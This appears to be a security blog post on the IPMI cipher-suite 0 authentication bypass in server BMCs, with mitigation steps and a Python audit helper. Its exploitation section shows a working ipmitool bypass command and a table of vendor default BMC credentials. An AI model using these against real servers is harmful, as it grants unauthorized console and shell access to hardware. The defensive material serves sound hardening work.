Information

Recently, Supermicro and a number of other companies have come under fire due to inherent vulnerabilities in their IPMI implementations. In this article, I’ll explore the consequences of the vulnerability, the ways in which it can be exploited, and some important mitigation strategies.

What is cipher-suite 0?

Cipher-suite 0 is a pseudo-cipher suite used in IPMI implementations which skips authentication entirely and grants full access without valid credentials.

This allows a remote attacker to exploit the BMC’s IPMI interface, present in many rackmount servers, to gain remote console access to the hardware and a shell on the embedded controller.

Exploitation

How do we exploit it?

Those familiar with IPMI will know the ipmitool command, used to control an IPMI controller locally or remotely from Linux.

To use ipmitool with cipher-suite 0, simply pass the -C 0 flag to the command. For example:

# ipmitool -I lanplus -C 0 -H 10.0.0.2 -U ADMIN -P password user list

Let’s break down what this command does:

ipmitool: the command used to control IPMI interfaces.
-I lanplus: specifies the IPMI v2.0 (RMCP+) LAN interface.
-C 0: cipher-suite 0, the subject of this article.
-H 10.0.0.2: the remote host to run the command against.
-U ADMIN: the username; use a valid username from the table below.
-P password: the password, which is arbitrary since it is ignored anyway.
user list: the command we wish to run; in this case, return a list of users.

This command will complete without issue despite not knowing the actual password.

Default usernames and passwords:

Vendor       Username   Password
Dell         root       Calvin
IBM          USERID     PASSW0RD
Supermicro   ADMIN      ADMIN
Oracle       root       changeme
Fujitsu      admin      admin
Asus         admin      admin

Mitigation

Using ipmitool, we’re able to disable cipher-suite 0. Run the following command on the local machine (through the OpenIPMI driver), or modify the flags to run it remotely:

# ipmitool -I open raw 0xC 0x1 1 0x18 0 0x40 0x44 0x44 0x44 0x44 0x44 0x44 0x4

The raw bytes are: NetFn 0xC (Transport) and command 0x1 (Set LAN Configuration Parameters), channel 1, parameter 0x18 (RMCP+ cipher-suite privilege levels), a reserved zero byte, and then eight bytes holding one privilege nibble per cipher suite (even-numbered suite in the low nibble, odd-numbered suite in the high nibble). The low nibble of the first byte is cipher-suite 0, set to 0 (unused), while suites 1 to 14 stay at 4 (Administrator). The LAN channel number differs between vendors, so check which channel your BMC uses before running this.

This should disable cipher-suite 0, effectively mitigating the flaw. Further, make sure you keep IPMI interfaces off public IP addresses, or addresses accessible to people who don’t need them. If you run an IDS, make sure it has cipher-suite 0 in its signature database.
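As an added example (not code from the original post), here is a small Python audit helper that parses the “Cipher Suite Priv Max” line of ipmitool lan print output, reports whether cipher-suite 0 is still mapped to a privilege level, and assembles the raw Set LAN Configuration Parameters command that unmaps suite 0 while preserving the other suites’ levels. The sample BMC output is constructed for the example and the ipmitool line format is an assumption; the nibble layout follows the IPMI 2.0 definition of parameter 0x18.

```python
import re

# Privilege-level nibble values for LAN config parameter 0x18 (RMCP+ cipher
# suite privilege levels) and the one-character form ipmitool prints for them.
PRIV_TO_NIBBLE = {"X": 0x0, "c": 0x1, "u": 0x2, "o": 0x3, "a": 0x4, "O": 0x5}

# Constructed sample of `ipmitool lan print 1` output; not from a real BMC.
# Suite 0 is mapped to ADMIN here, i.e. the exposed configuration.
SAMPLE_LAN_PRINT = """\
IP Address              : 10.0.0.2
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
"""

def parse_priv_max(lan_print):
    """Map cipher-suite number -> privilege char from the 'Priv Max' line."""
    m = re.search(r"Cipher Suite Priv Max\s*:\s*([XcuoaO]+)", lan_print)
    if not m:
        raise ValueError("no 'Cipher Suite Priv Max' line in ipmitool output")
    return dict(enumerate(m.group(1)))

def cipher0_enabled(lan_print):
    """True when cipher-suite 0 is mapped to any privilege level."""
    return parse_priv_max(lan_print).get(0, "X") != "X"

def encode_priv_levels(privs):
    """Build the eight data bytes of parameter 0x18: two suites per byte,
    even suite in the low nibble, odd suite in the high nibble."""
    data = []
    for even in range(0, 16, 2):
        lo = PRIV_TO_NIBBLE[privs.get(even, "X")]
        hi = PRIV_TO_NIBBLE[privs.get(even + 1, "X")]
        data.append((hi << 4) | lo)
    return data

def disable_cipher0_command(lan_print, channel=1):
    """Raw ipmitool command that unmaps suite 0 but keeps the other levels."""
    privs = parse_priv_max(lan_print)
    privs[0] = "X"
    hexbytes = " ".join("0x%02X" % b for b in encode_priv_levels(privs))
    return "ipmitool -I open raw 0x0C 0x01 %d 0x18 0x00 %s" % (channel, hexbytes)

if __name__ == "__main__":
    print("cipher suite 0 exposed:", cipher0_enabled(SAMPLE_LAN_PRINT))
    print(disable_cipher0_command(SAMPLE_LAN_PRINT))
```

Feeding encode_priv_levels a map with suites 1 to 14 set to "a" reproduces the byte string from the command above (0x40, six times 0x44, 0x04), which is a quick way to confirm what that command actually writes.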